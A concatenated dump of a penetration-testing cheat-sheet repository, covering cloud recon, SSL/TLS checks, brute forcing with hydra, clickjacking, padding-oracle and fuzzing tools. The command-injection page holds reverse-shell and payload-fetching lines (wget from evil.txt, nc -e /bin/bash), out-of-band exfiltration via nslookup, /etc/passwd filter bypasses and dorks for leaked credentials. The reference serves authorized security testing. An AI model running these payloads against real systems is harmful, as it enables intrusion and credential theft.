bunch of info, scripts and knowledge used during my 4 | pentests. 5 | --- 6 | 7 | # /home/six2dez/.pentest-book 8 | 9 | Thanks to visit this site, please consider enhance this book with some awesome tools or techniques you know, you can contact me by Telegram([@six2dez](https://t.me/six2dez)), Twitter([@six2dez1](https://twitter.com/Six2dez1)) or Discord(six2dez#8201), GitHub pull request is welcomed too ;) **Hack 'em all** 10 | 11 | ### **Usage: Just use the search bar at the upper or navigate through the sections of the left zone. Enjoy it** :blush: 12 | 13 | **Don't you know where to go now?** Let me introduce you to some of the most **popular pages** on this wiki: 14 | 15 | * Know your target! Make a proper [recon](recon/public-info-gathering.md)! 16 | * What can you do in those strange [ports](enumeration/ports.md)? 17 | * Doing a [web pentest](enumeration/web/)? Don't forget to check out any of these common attacks! 18 | * Do you have the same hype as me with [cloud ](enumeration/cloud/)services? They also have their vulnerabilities 19 | * Stuck again with Windows and [Kerberos](post-exploitation/windows/ad/kerberos-attacks.md)? Here is my cheatsheet 20 | * The mobile world does not stop growing, see my tips for [Android ](mobile/android.md)and [iOS](mobile/ios.md) 21 | * [Burp Suite ](others/burp.md)is the tool most loved by everyone, but you have to know a few tricks, also check my [preferred extensions](others/burp.md#preferred-extensions) 22 | * I'm really proud of [Pentesting Web Checklist](others/web-checklist.md) 23 | * If you want to know which web fuzzer fits you best, take a look at the [comparison](others/web-fuzzers-comparision.md). 24 | 25 | **Important note**: I use this wiki daily for my work and I am constantly updating it. I'm very sorry if a link to a page changes or I move it, if you need something you are free to contact me. 26 | 27 | You can support this work buying me a coffee: 28 | 29 | {% embed url="https://www.buymeacoffee.com/six2dez" %} 30 | 31 | 32 | 33 | ### Stargazers over time 34 | 35 | ![Stargazers over time](https://starchart.cc/six2dez/pentest-book.svg) 36 | 37 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [/home/six2dez/.pentest-book](README.md) 4 | * [Contribute/Donate](https://www.buymeacoffee.com/six2dez) 5 | 6 | ## Recon 7 | 8 | * [Public info gathering](recon/public-info-gathering.md) 9 | * [Root domains](recon/domain-enum.md) 10 | * [Subdomain Enum](recon/subdomain-enum/README.md) 11 | * [Subdomain Takeover](recon/subdomain-enum/subdomain-takeover.md) 12 | * [Webs recon](recon/webs-recon.md) 13 | * [Network Scanning](recon/network-scanning.md) 14 | * [Host Scanning](recon/host-scanning.md) 15 | * [Packet Scanning](recon/packet-scanning.md) 16 | 17 | ## Enumeration 18 | 19 | * [Files](enumeration/files.md) 20 | * [SSL/TLS](enumeration/ssl-tls.md) 21 | * [Ports](enumeration/ports.md) 22 | * [Web Attacks](enumeration/web/README.md) 23 | * [General Info](enumeration/web/general-info.md) 24 | * [Quick tricks](enumeration/web/quick-tricks.md) 25 | * [Header injections](enumeration/web/header-injections.md) 26 | * [Bruteforcing](enumeration/web/bruteforcing.md) 27 | * [Online hashes cracked](enumeration/web/online-hashes-cracked.md) 28 | * [Crawl/Fuzz](enumeration/web/crawl-fuzz.md) 29 | * [LFI/RFI](enumeration/web/lfi-rfi.md) 30 | * [File upload](enumeration/web/upload-bypasses.md) 31 | * [SQLi](enumeration/web/sqli.md) 32 | * [SSRF](enumeration/web/ssrf.md) 33 | * [Open redirects](enumeration/web/open-redirects.md) 34 | * [XSS](enumeration/web/xss.md) 35 | * [CSP](enumeration/web/csp.md) 36 | * [XXE](enumeration/web/xxe.md) 37 | * [Cookie Padding](enumeration/web/cookie-padding.md) 38 | * [Webshells](enumeration/web/web-shells.md) 39 | * [CORS](enumeration/web/cors.md) 40 | * [CSRF](enumeration/web/csrf.md) 41 | * [Web Cache Poisoning](enumeration/web/web-cache-poisoning.md) 42 | * [Broken Links](enumeration/web/broken-links.md) 43 | * [Clickjacking](enumeration/web/clickjacking.md) 44 | * [HTTP Request Smuggling](enumeration/web/request-smuggling.md) 45 | * [Web Sockets](enumeration/web/web-sockets.md) 46 | * [CRLF](enumeration/web/crlf.md) 47 | * [IDOR](enumeration/web/idor.md) 48 | * [Web Cache Deception](enumeration/web/web-cache-deception.md) 49 | * [Session fixation](enumeration/web/session-fixation.md) 50 | * [Email attacks](enumeration/web/email-attacks.md) 51 | * [Pastejacking](enumeration/web/pastejacking.md) 52 | * [HTTP Parameter pollution](enumeration/web/parameter-pollution.md) 53 | * [SSTI](enumeration/web/ssti.md) 54 | * [Prototype Pollution](enumeration/web/prototype-pollution.md) 55 | * [Command Injection](enumeration/web/command-injection.md) 56 | * [Deserialization](enumeration/web/deserialization.md) 57 | * [DNS rebinding](enumeration/web/dns-rebinding.md) 58 | * [Web Technologies](enumeration/webservices/README.md) 59 | * [APIs](enumeration/webservices/apis.md) 60 | * [JS](enumeration/webservices/js.md) 61 | * [ASP.NET](enumeration/webservices/.net.md) 62 | * [JWT](enumeration/webservices/jwt.md) 63 | * [GitHub](enumeration/webservices/github.md) 64 | * [GitLab](enumeration/webservices/gitlab.md) 65 | * [WAFs](enumeration/webservices/wafs.md) 66 | * [Firebird](enumeration/webservices/firebird.md) 67 | * [Wordpress](enumeration/webservices/wordpress.md) 68 | * [WebDav](enumeration/webservices/webdav.md) 69 | * [Joomla](enumeration/webservices/joomla.md) 70 | * [Jenkins](enumeration/webservices/jenkins.md) 71 | * [IIS](enumeration/webservices/iis.md) 72 | * [VHosts](enumeration/webservices/vhosts.md) 73 | * [Firebase](enumeration/webservices/firebase.md) 74 | * [OWA](enumeration/webservices/owa.md) 75 | * [OAuth](enumeration/webservices/oauth.md) 76 | * [Flask](enumeration/webservices/flask.md) 77 | * [Symfony && Twig](enumeration/webservices/symfony-and-and-twig.md) 78 | * [Drupal](enumeration/webservices/drupal.md) 79 | * [NoSQL (MongoDB, CouchDB)](enumeration/webservices/nosql-and-and-mongodb.md) 80 | * [PHP](enumeration/webservices/php.md) 81 | * [RoR (Ruby on Rails)](enumeration/webservices/ror-ruby-on-rails.md) 82 | * [JBoss - Java Deserialization](enumeration/webservices/jboss-java-deserialization.md) 83 | * [OneLogin - SAML Login](enumeration/webservices/onelogin-saml-login.md) 84 | * [Flash SWF](enumeration/webservices/flash-swf.md) 85 | * [Nginx](enumeration/webservices/nginx.md) 86 | * [Python](enumeration/webservices/python.md) 87 | * [Tomcat](enumeration/webservices/tomcat.md) 88 | * [Adobe AEM](enumeration/webservices/adobe-aem.md) 89 | * [Magento](enumeration/webservices/magento.md) 90 | * [SAP](enumeration/webservices/sap.md) 91 | * [MFA/2FA](enumeration/webservices/mfa.md) 92 | * [GWT](enumeration/webservices/gwt.md) 93 | * [Jira](enumeration/webservices/jira.md) 94 | * [OIDC (Open ID Connect)](enumeration/webservices/oidc-open-id-connect.md) 95 | * [ELK](enumeration/webservices/elk.md) 96 | * [Sharepoint](enumeration/webservices/sharepoint.md) 97 | * [Others](enumeration/webservices/others.md) 98 | * [Cloud](enumeration/cloud/README.md) 99 | * [General](enumeration/cloud/general.md) 100 | * [Cloud Info Gathering](enumeration/cloud/cloud-info-recon.md) 101 | * [AWS](enumeration/cloud/aws.md) 102 | * [Azure](enumeration/cloud/azure.md) 103 | * [GCP](enumeration/cloud/gcp.md) 104 | * [Docker && Kubernetes](enumeration/cloud/docker-and-and-kubernetes.md) 105 | * [CDN - Comain Fronting](enumeration/cloud/cdn-comain-fronting.md) 106 | 107 | ## Exploitation 108 | 109 | * [Payloads](exploitation/payloads.md) 110 | * [Reverse Shells](exploitation/reverse-shells.md) 111 | * [File transfer](exploitation/file-transfer.md) 112 | 113 | ## Post Exploitation 114 | 115 | * [Linux](post-exploitation/linux.md) 116 | * [Pivoting](post-exploitation/pivoting.md) 117 | * [Windows](post-exploitation/windows/README.md) 118 | * [AD](post-exploitation/windows/ad/README.md) 119 | * [Kerberos](post-exploitation/windows/ad/kerberos-attacks.md) 120 | * [PS tips & tricks](post-exploitation/windows/ps-tips-and-tricks.md) 121 | 122 | ## Mobile 123 | 124 | * [General](mobile/general.md) 125 | * [Android](mobile/android.md) 126 | * [iOS](mobile/ios.md) 127 | 128 | ## Others 129 | 130 | * [Burp Suite](others/burp.md) 131 | * [Password cracking](others/password-cracking.md) 132 | * [VirtualBox](others/virtualbox.md) 133 | * [LLM/AI/ML/prompt testing](others/llm-ai-ml-prompt-testing.md) 134 | * [Code review](others/code-review.md) 135 | * [Pentesting Web checklist](others/web-checklist.md) 136 | * [Internal Pentest](others/internal-pentest.md) 137 | * [Web fuzzers review](others/web-fuzzers-comparision.md) 138 | * [Recon suites review](others/recon-suites-review.md) 139 | * [Subdomain tools review](others/subdomain-tools-review.md) 140 | * [Random](others/dictionaries.md) 141 | * [Master assessment mindmaps](others/master-assessment-mindmap.md) 142 | * [BugBounty](others/bugbounty.md) 143 | * [Exploiting](others/exploiting.md) 144 | * [tools everywhere](others/tools-everywhere.md) 145 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | title: pentest-book 4 | theme: jekyll-theme-hacker 5 | markdown: kramdown 6 | highlighter: rouge 7 | tipue_search: 8 | include: 9 | pages: true 10 | -------------------------------------------------------------------------------- /enumeration/cloud/README.md: -------------------------------------------------------------------------------- 1 | # Cloud 2 | 3 | * [General](general.md) 4 | * [AWS](aws.md) 5 | * [Azure](azure.md) 6 | * [Google Cloud Platform](gcp.md) 7 | * [Cloud Info Gathering](cloud-info-recon.md) 8 | * [Docker && Kubernetes](docker-and-and-kubernetes.md) 9 | * [CDNs](cdn-comain-fronting.md) 10 | 11 | -------------------------------------------------------------------------------- /enumeration/cloud/cdn-comain-fronting.md: -------------------------------------------------------------------------------- 1 | # CDN - Comain Fronting 2 | 3 | ```text 4 | CDN - Domain Fronting 5 | 6 | **Tools** 7 | https://github.com/rvrsh3ll/FindFrontableDomains 8 | https://github.com/stevecoward/domain-fronting-tools 9 | # Domain Fronting TLS 1.3 10 | https://github.com/SixGenInc/Noctilucent 11 | https://github.com/vysecurity/DomainFrontingLists 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /enumeration/cloud/cloud-info-recon.md: -------------------------------------------------------------------------------- 1 | # Cloud Info Gathering 2 | 3 | 4 | 5 | ```text 6 | # Azure IP Ranges 7 | https://azurerange.azurewebsites.net/ 8 | 9 | # AWS IP Range 10 | https://ip-ranges.amazonaws.com/ip-ranges.json 11 | - Get creation date 12 | jq .createDate < ip-ranges.json 13 | - Get info for specific region 14 | jq '.prefixes[] | select(.region=="us-east-1")' < ip-ranges.json 15 | - Get all IPs 16 | jq -r '.prefixes | .[].ip_prefix' < ip-ranges.json 17 | 18 | # Online services 19 | https://viewdns.info/ 20 | https://securitytrails.com/ 21 | https://www.shodan.io/search?query=net%3A%2234.227.211.0%2F24%22 22 | https://censys.io/ipv4?q=s3 23 | 24 | #Azure AD Recon 25 | https://github.com/dievus/Oh365UserFinder 26 | 27 | #AWS Recon 28 | https://github.com/righteousgambit/quiet-riot 29 | 30 | # Google Dorks 31 | site:*.amazonaws.com -www "compute" 32 | site:*.amazonaws.com -www "compute" "ap-south-1" 33 | site:pastebin.com "rds.amazonaws.com" "u " pass OR password 34 | https://storage.googleapis.com/COMPANY 35 | 36 | # Check certificate transparency logs 37 | https://crt.sh 38 | %.netfilx.com 39 | 40 | # Find Cloud Services 41 | python3 cloud_enum.py -k keywork 42 | python3 CloudScraper.py -u https://example.com 43 | 44 | # AWS Buckets 45 | # Dork 46 | site:*.s3.amazonaws.com ext:xls | ext:xlsx | ext:csv password|passwd|pass user|username|uid|email 47 | 48 | # AWS discovering, stealing keys and endpoints 49 | # Nimbostratus - check against acutal profile 50 | https://github.com/andresriancho/nimbostratus 51 | python nimbostratus dump-credentials 52 | 53 | # ScoutSuite - audit AWS, GCP and Azure clouds 54 | scout --provider aws --profile stolen 55 | 56 | # Prowler - AWS security assessment, auditing and hardening 57 | https://github.com/toniblyx/prowler 58 | ``` 59 | 60 | -------------------------------------------------------------------------------- /enumeration/files.md: -------------------------------------------------------------------------------- 1 | # Files 2 | 3 | ### Common 4 | 5 | ```bash 6 | # Check real file type 7 | file file.xxx 8 | 9 | # Analyze strings 10 | strings file.xxx 11 | strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars 12 | 13 | # Check embedded files 14 | binwalk file.xxx # Check 15 | binwalk -e file.xxx # Extract 16 | 17 | # Check as binary file in hex 18 | ghex file.xxx 19 | 20 | # Check metadata 21 | exiftool file.xxx 22 | 23 | # Stego tool for multiple formats 24 | wget https://embeddedsw.net/zip/OpenPuff_release.zip 25 | unzip OpenPuff_release.zip -d ./OpenPuff 26 | wine OpenPuff/OpenPuff_release/OpenPuff.exe 27 | 28 | # Compressed files 29 | fcrackzip file.zip 30 | # https://github.com/priyankvadaliya/Zip-Cracker- 31 | python zipcracker.py -f testfile.zip -d passwords.txt 32 | python zipcracker.py -f testfile.zip -d passwords.txt -o extractdir 33 | 34 | # Office documents 35 | https://github.com/assafmo/xioc 36 | 37 | # Zip files in website 38 | pip install remotezip 39 | # list contents of a remote zip file 40 | remotezip -l "http://site/bigfile.zip" 41 | # extract file.txt from a remote zip file 42 | remotezip "http://site/bigfile.zip" "file.txt" 43 | 44 | # Grep inside any files 45 | # https://github.com/phiresky/ripgrep-all 46 | rga "whatever" folder/ 47 | ``` 48 | 49 | ### Disk files 50 | 51 | ```bash 52 | # guestmount can mount any kind of disk file 53 | sudo apt-get install libguestfs-tools 54 | guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory 55 | ``` 56 | 57 | ### Audio 58 | 59 | ```bash 60 | # Check spectrogram 61 | wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb 62 | dpkg -i sonic-visualiser_4.0_amd64.deb 63 | 64 | # Check for Stego 65 | hideme stego.mp3 -f && cat output.txt #AudioStego 66 | ``` 67 | 68 | ### Images 69 | 70 | ```bash 71 | # Stego 72 | wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar 73 | chmod +x stegsolve.jar 74 | java -jar stegsolve.jar 75 | 76 | # Stegpy 77 | stegpy -p file.png 78 | 79 | # Check png corrupted 80 | pngcheck -v image.jpeg 81 | 82 | # Check what kind of image is 83 | identify -verbose image.jpeg 84 | 85 | # Stegseek 86 | # https://github.com/RickdeJager/stegseek 87 | stegseek --seed file.jpg 88 | stegseek file.jpg rockyou.txt 89 | ``` 90 | 91 | -------------------------------------------------------------------------------- /enumeration/ssl-tls.md: -------------------------------------------------------------------------------- 1 | # SSL/TLS 2 | 3 | ## DROWN 4 | 5 | ```bash 6 | # Check for "SSLv2 supported" 7 | nmap –p- –sV –sC example.com 8 | ``` 9 | 10 | ## TLS\_FALLBACK\_SCSV 11 | 12 | ```bash 13 | # Check in the lower port 14 | openssl s_client –tls1 -fallback_scsv -connect example.com:443 15 | # - Response: 16 | # tlsv1 alert inappropriate fallback:s3_pkt.c:1262:SSL alert number 86 17 | ``` 18 | 19 | ## BEAST 20 | 21 | ```bash 22 | # TLSv1.0 and CBC ciphers 23 | openssl s_client -[sslv3/tls1] -cipher CBC_CIPHER -connect example.com:443 24 | ``` 25 | 26 | ## LUCKY13 27 | 28 | ```bash 29 | openssl s_client -cipher CBC_CIPHER -connect example.com:443 30 | ``` 31 | 32 | ## Sweet32 33 | 34 | ```bash 35 | openssl s_client -cipher 3DES -connect example.com:443 36 | ``` 37 | 38 | ## Logjam 39 | 40 | ```bash 41 | # Check the "Server Temp Key" response is bigger than 1024 (only in OpenSSL 1.0.2 or better) 42 | openssl s_client -connect www.example.com:443 -cipher "EDH" 43 | ``` 44 | 45 | ## SSLv2 Support 46 | 47 | ```bash 48 | # If is supported this will return the server certificate information if not, error 49 | openssl s_client –ssl2 -connect example.com:443 50 | ``` 51 | 52 | ## SSLv3 Support 53 | 54 | ```bash 55 | # If is supported this will return the server certificate information if not, error 56 | openssl s_client -ssl3 -connect google.com:443 57 | ``` 58 | 59 | ## Cipher suites 60 | 61 | ```bash 62 | # Cipher Suites 63 | nmap --script ssl-enum-ciphers -p 443 example.com 64 | 65 | # - Anon cypher (fail) 66 | openssl s_client -cipher aNULL -connect example.com:443 67 | 68 | # - DES Cipher (fail) 69 | openssl s_client -cipher DES -connect example.com:443 70 | 71 | # - 3DES Cipher (fail) 72 | openssl s_client -cipher 3DES -connect example.com:443 73 | 74 | # - Export Cipher (fail) 75 | openssl s_client -cipher EXPORT -connect example.com:443 76 | 77 | # - Low Cipher (fail) 78 | openssl s_client -cipher LOW -connect example.com:443 79 | 80 | # - RC4 Cipher (fail) 81 | openssl s_client -cipher RC4 -connect example.com:443 82 | 83 | # - NULL Cipher (fail) 84 | openssl s_client -cipher NULL -connect example.com:443 85 | 86 | # - Perfect Forward Secrecy Cipher (This should NOT fail): 87 | openssl s_client -cipher EECDH, EDH NULL -connect example.com:443 88 | ``` 89 | 90 | ## Secure renegotiation 91 | 92 | ```bash 93 | # Check secure renegotiation is not supported 94 | # If not, send request in the renegotiation 95 | # Once sent, if it's vulnerable it shouldn't return error 96 | openssl s_client -connect example.com:443 97 | HEAD / HTTP/1.0 98 | R 99 | # 100 | ``` 101 | 102 | ## CRIME 103 | 104 | ```bash 105 | # Check for "Compression: NONE" 106 | openssl s_client -connect example.com:443 107 | ``` 108 | 109 | ## BREACH 110 | 111 | ```bash 112 | # If the response contains encoded data, host is vulnerable 113 | openssl s_client -connect example.com:443 114 | GET / HTTP/1.1 115 | Host: example.com 116 | Accept-Encoding: compress, gzip 117 | ``` 118 | 119 | ## Heartbleed 120 | 121 | ```bash 122 | # Heartbleed 123 | nmap -p 443 --script ssl-heartbleed --script-args vulns.showall example.com 124 | 125 | # Heartbleed checker oneliner from sites list 126 | cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done 127 | ``` 128 | 129 | ## Change cipher spec injection 130 | 131 | ```bash 132 | nmap -p 443 --script ssl-ccs-injection example.com 133 | ``` 134 | 135 | ## Cipher order enforcement 136 | 137 | ```bash 138 | # Choose a protocol and 2 different ciphers, one stronger than other 139 | # Make 2 request with different cipher order anc check in the response if the cipher is the first of the request in both cases 140 | nmap -p 443 --script ssl-enum-ciphers example.com 141 | openssl s_client –tls1_2 –cipher ‘AES128-GCM-SHA256:AES128-SHA’ –connect contextis.co.uk:443 142 | openssl s_client –tls1_2 –cipher ‘AES128-SHA:AES128-GCM-SHA256’ –connect contextis.co.uk:443 143 | ``` 144 | 145 | -------------------------------------------------------------------------------- /enumeration/web/README.md: -------------------------------------------------------------------------------- 1 | # Web Attacks 2 | 3 | **Check out in the left submenu what common attack you want review** 4 | 5 | ![](../../.gitbook/assets/y7ipicwvp5d41\[1].png) 6 | -------------------------------------------------------------------------------- /enumeration/web/broken-links.md: -------------------------------------------------------------------------------- 1 | # Broken Links 2 | 3 | ## Tools 4 | 5 | ```bash 6 | # https://github.com/stevenvachon/broken-link-checker 7 | blc -rfoi --exclude linkedin.com --exclude youtube.com --filter-level 3 https://example.com/ 8 | ``` 9 | 10 | -------------------------------------------------------------------------------- /enumeration/web/bruteforcing.md: -------------------------------------------------------------------------------- 1 | # Bruteforcing 2 | 3 | ```bash 4 | cewl 5 | hash-identifier 6 | # https://github.com/HashPals/Name-That-Hash 7 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 8 | medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10 9 | ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111 10 | crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1 11 | patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422' 12 | hydra -l root -P password-file.txt 10.11.1.111 ssh 13 | hydra -P password-file.txt -v 10.11.1.111 snmp 14 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V 15 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V 16 | hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V 17 | hydra -L username.txt -p paswordl33t -t 4 ssh://10.10.1.111 18 | hydra -L user.txt -P pass.txt 10.10.1.111 ftp 19 | 20 | # PATATOR 21 | patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422' 22 | 23 | # SIMPLE LOGIN GET 24 | hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V 25 | 26 | # GET FORM with HTTPS 27 | hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!" 28 | 29 | # SIMPLE LOGIN POST 30 | hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I 31 | 32 | # API REST LOGIN POST 33 | hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64 34 | 35 | # Password spraying bruteforcer 36 | # https://github.com/x90skysn3k/brutespray 37 | python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5 38 | 39 | # Password generator 40 | # https://github.com/edoardottt/longtongue 41 | python3 longtongue.py 42 | 43 | https://many-passwords.github.io/ 44 | ``` 45 | -------------------------------------------------------------------------------- /enumeration/web/clickjacking.md: -------------------------------------------------------------------------------- 1 | # Clickjacking 2 | 3 | ## General 4 | 5 | {% hint style="info" %} 6 | Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website. 7 | 8 | * Preventions: 9 | * X-Frame-Options: deny/sameorigin/allow-from 10 | * CSP: policy/frame-ancestors 'none/self/domain.com' 11 | {% endhint %} 12 | 13 | ```markup 14 | # An example using the style tag and parameters is as follows: 15 | 16 | 31 | 32 | ... 33 | 34 |
35 | ...decoy web content here... 36 |
37 | 39 | 40 | ``` 41 | 42 | -------------------------------------------------------------------------------- /enumeration/web/command-injection.md: -------------------------------------------------------------------------------- 1 | # Command Injection 2 | 3 | {% hint style="info" %} 4 | Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. 5 | {% endhint %} 6 | 7 | ```text 8 | # For detection, try to concatenate another command to param value 9 | & 10 | ; 11 | Newline (0x0a or \n) 12 | && 13 | | 14 | || 15 | # like: https://target.com/whatever?param=1|whoami 16 | 17 | # Blind (Time delay) 18 | https://target.com/whatever?param=x||ping+-c+10+127.0.0.1|| 19 | 20 | # Blind (Redirect) 21 | https://target.com/whatever?param=x||whoami>/var/www/images/output.txt|| 22 | 23 | # Blind (OOB) 24 | https://target.com/whatever?param=x||nslookup+burp.collaborator.address|| 25 | https://target.com/whatever?param=x||nslookup+`whoami`.burp.collaborator.address|| 26 | 27 | # Common params: 28 | cmd 29 | exec 30 | command 31 | execute 32 | ping 33 | query 34 | jump 35 | code 36 | reg 37 | do 38 | func 39 | arg 40 | option 41 | load 42 | process 43 | step 44 | read 45 | function 46 | req 47 | feature 48 | exe 49 | module 50 | payload 51 | run 52 | print 53 | 54 | # Useful Commands: Linux 55 | whoami 56 | ifconfig 57 | ls 58 | uname -a 59 | 60 | # Useful Commands: Windows 61 | whoami 62 | ipconfig 63 | dir 64 | ver 65 | 66 | # Both Unix and Windows supported 67 | ls||id; ls ||id; ls|| id; ls || id 68 | ls|id; ls |id; ls| id; ls | id 69 | ls&&id; ls &&id; ls&& id; ls && id 70 | ls&id; ls &id; ls& id; ls & id 71 | ls %0A id 72 | 73 | # Time Delay Commands 74 | & ping -c 10 127.0.0.1 & 75 | 76 | # Redirecting output 77 | & whoami > /var/www/images/output.txt & 78 | 79 | # OOB (Out Of Band) Exploitation 80 | & nslookup attacker-server.com & 81 | & nslookup `whoami`.attacker-server.com & 82 | 83 | # WAF bypasses 84 | vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php 85 | vuln=127.0.0.1%0anohup nc -e /bin/bash 86 | vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload 87 | 88 | # Some filter bypasses 89 | cat /etc/passwd 90 | cat /e”t”c/pa”s”swd 91 | cat /’e’tc/pa’s’ swd 92 | cat /etc/pa??wd 93 | cat /etc/pa*wd 94 | cat /et’ ‘c/passw’ ‘d 95 | cat /et$()c/pa$()$swd 96 | {cat,/etc/passwd} 97 | cat /???/?????d 98 | 99 | # Tools 100 | https://github.com/commixproject/commix 101 | ``` 102 | 103 | 104 | 105 | -------------------------------------------------------------------------------- /enumeration/web/cookie-padding.md: -------------------------------------------------------------------------------- 1 | # Cookie Padding 2 | 3 | ```bash 4 | # https://github.com/AonCyberLabs/PadBuster 5 | # Get cookie structure 6 | padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" 7 | # Get cookie for other user (impersonation) 8 | padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorhc0nwithyhackme' 9 | 10 | #https://github.com/glebarez/padre 11 | padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==' 12 | 13 | # https://github.com/Kibouo/rustpad 14 | 15 | ``` 16 | -------------------------------------------------------------------------------- /enumeration/web/crawl-fuzz.md: -------------------------------------------------------------------------------- 1 | # Crawl/Fuzz 2 | 3 | ```bash 4 | # Crawlers 5 | dirhunt https://url.com/ 6 | hakrawler -domain https://url.com/ 7 | python3 sourcewolf.py -h 8 | gospider -s "https://example.com/" -o output -c 10 -d 1 9 | gospider -S sites.txt -o output -c 10 -d 1 10 | gospider -s "https://example.com/" -o output -c 10 -d 1 --other-source --include-subs 11 | 12 | # Fuzzers 13 | # ffuf 14 | # Discover content 15 | ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w six2dez/OneListForAll/onelistforall.txt -u https://url.com/FUZZ 16 | # Headers discover 17 | ffuf -mc all -ac -u https://hackxor.net -w six2dez/OneListForAll/onelistforall.txt -c -H "FUZZ: Hellothereheadertesting123 asd" 18 | # Ffuf - burp 19 | ffuf -replay-proxy http:127.0.0.1:8080 20 | # Fuzzing extensions 21 | # General 22 | .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.inc 23 | # Backups 24 | '.bak','.bac','.old','.000','.~','.01','._bak','.001','.inc','.Xxx' 25 | 26 | # kr 27 | # https://github.com/assetnote/kiterunner 28 | kr brute https://whatever.com/ -w onelistforallmicro.txt -x 100 --fail-status-codes 404 29 | kr scan https://whatever.com/ -w routes-small.kite -A=apiroutes-210228 -x 100 --ignore-length=34 30 | 31 | # chameleon 32 | # https://github.com/iustin24/chameleon 33 | ./chameleon -u http://testphp.vulnweb.com -a -A 34 | 35 | # Best wordlists for fuzzing: 36 | # https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content 37 | - raft-large-directories-lowercase.txt 38 | - directory-list-2.3-medium.txt 39 | - RobotsDisallowed/top10000.txt 40 | # https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithext - 41 | # https://github.com/random-robbie/bruteforce-lists 42 | # https://github.com/google/fuzzing/tree/master/dictionaries 43 | # https://github.com/six2dez/OneListForAll 44 | # AIO: https://github.com/foospidy/payloads 45 | # Check https://wordlists.assetnote.io/ 46 | 47 | # Pro tip: set "Host: localhost" as header 48 | 49 | # Custom generated dictionary 50 | gau example.com | unfurl -u paths 51 | # Get files only 52 | sed 's#/#\n#g' paths.txt |sort -u 53 | # Other things 54 | gau example.com | unfurl -u keys 55 | gau example.com | head -n 1000 |fff -s 200 -s 404 56 | 57 | # Hadrware devices admin panel 58 | # https://github.com/InfosecMatter/default-http-login-hunter 59 | default-http-login-hunter.sh https://10.10.0.1:443/ 60 | 61 | # Dirsearch 62 | dirsearch -r -f -u https://10.11.1.111 --extensions=htm,html,asp,aspx,txt -w six2dez/OneListForAll/onelistforall.txt --request-by-hostname -t 40 63 | 64 | # dirb 65 | dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt 66 | 67 | # wfuzz 68 | wfuzz -c -z file,six2dez/OneListForAll/onelistforall.txt --hc 404 http://10.11.1.11/FUZZ 69 | 70 | # gobuster 71 | gobuster dir -u http://10.11.1.111 -w six2dez/OneListForAll/onelistforall.txt -s '200,204,301,302,307,403,500' -e 72 | 73 | # Cansina 74 | # https://github.com/deibit/cansina 75 | python3 cansina.py -u example.com -p PAYLOAD 76 | 77 | # Ger endpoints from JS 78 | # LinkFinder 79 | # https://github.com/GerbenJavado/LinkFinder 80 | python linkfinder.py -i https://example.com -d 81 | python linkfinder.py -i burpfile -b 82 | 83 | # JS enumeration 84 | # https://github.com/KathanP19/JSFScan.sh 85 | 86 | # Tip, if 429 add one of these headers: 87 | Client-Ip: IP 88 | 